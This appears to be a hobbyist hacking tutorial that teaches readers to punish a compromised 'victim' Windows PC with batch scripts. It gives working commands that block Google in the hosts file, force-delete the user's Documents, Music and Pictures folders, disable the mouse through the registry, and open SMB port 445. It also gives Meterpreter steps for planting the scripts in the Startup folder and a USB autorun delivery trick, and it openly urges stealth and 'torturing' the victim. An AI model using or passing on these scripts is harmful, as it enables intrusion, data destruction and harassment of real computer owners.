At last, what you all finally waited for!
Hi! Fire Crackers,
Welcome to my 7th post (Part-3), this tutorial will explain about some situations and how to make the Victim's Life like Hell! And fill his system with Malware.
- Go ahead and exploit the Victim's PC.
Let me Supply you some (Real) Ammo:
------------Copied From here BUT, edited, + added my own-----------
Go to that site and choose your weapons and ammo.
1) Block Google.
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
It adds this Domain/Website name to the hosts folder, and any-website contained in this folder gets blocked (In simple words)
2) Change time:
I didn't like it but its quite freaky!
3) Delete My Pictures , Documents etc...
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
del /f /q "C:\Users\%userprofile%\My Music\*.*"
del /f /q "C:\Users\%userprofile%\My Pictures\*.*"
- del means delete.
- /f is a switch, which force deletes the files, if they are read-only.
- /q is a switch, which quietly deletes the files without any prompts.
- *.* to delete all the items in the current directory.
4) Swap Mouse Button:
An easy scripts, that changes the setting of mouse from control panel.
5) Disable Mouse:
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4_
Complicated Script, Edits the registry settings for mouse, By navigating to its folder and editing DWORD (+ other values.)
If you need more scripts, but can't understand the meaning then, ask me in the comments section
I have exploited the PC, on WAN with static IP as my NET Connection is Slightly faster, but I highly recommend to do this on LAN, because Uploading will take Hours Until the Victim's as well as the attackers connection Speed is FAST!
After the Meterpreter Prompt:
- FIRST, Download all the important, information you need, before it gets deleted by these scripts.
- Copy those scripts above and paste then in notepad and save them with the extension .bat
- Now it's time to upload them, all!
- You can also make your own scripts like of aggravating messages etc. (which will Welcome the user at start-up with the word "DIE".
- Save all the scripts with the name, a,b,c,d,e (.bat) respectively.
- Move these scripts to the root directory of Kali (the host)
- Type: (In the meterpreter:)
- cd /
- cd Users/%pf%/AppData/Roaming/Microsoft/Windows/"Start Menu"/Programs/Startup
- Upload a.bat
- Upload b.bat
- Upload c.bat
- Upload d.bat
- Upload e.bat
On the victim's Side:
- These Scrips will execute as soon as the Victim's system is Started/Re-Started
- I am not going to show you how to make scripts that send victim's Log Data Through FTP, because you can simply use the download command or in-build Kali meterpreter commands/modules.
- Don't use scripts like the Folder Bomber etc, or the victim will become suspicious and format his PC.
- Now. I hope you can make scripts that slowly eat RAM in the background, use Task Scheduler etc...
- Also, don't use scripts that FORMATs his/her PC, in other words,
- Torture the Victim, don't just simply Kill him!
- And my work for this situation is done here.
- Victim can use safe mode to counter this, but can have a hard time finding it in Windows 8.
You can use batch scripts, for even exploiting the PC!
You need a physical access to the PC, (or Convince the Victim to open the script.)
- Copy this script:
netsh firewall set portopening tcp 445 smb enable
Cause:Opens the specified port and make the victim, Vulnerable.
(Open all the vulnerable ports)
- Save it as anything.bat
- Make an autorun file:
- Save it as autorun.inf.
- Put them in a Flash/Pen Drive. Connect this drive to the victims PC for about five seconds, and pull it out.
- Done! (No one knows what you just did!)
- Exploit and have Fun!
- Batch scripts can be easily opened/edited and read by anyone, it's better to convert them to .exe (executable files)
- Some Batch files may need Admin Permission.
- So, you can manually execute them by going into the shell and navigating to the correct directory and typing start whatever.bat
- Situation 2, may not work if the auto-run is disabled.
- And try some more Disables: Here
I hope you had Fun today!
The Final part of Batch, will be about Protection using Batch!
Until then ByE.
Keep Coming for More!
It’s Black Friday week in the Null Byte shop! If you’ve been wanting to improve your skill set in hacker- and cybersecurity-geared topics such as Python, Raspberry Pi, and Linux, now’s the time. We’ve got huge sales on online courses, and we’ve outlined 13 favorites you won’t want to miss. Check them out!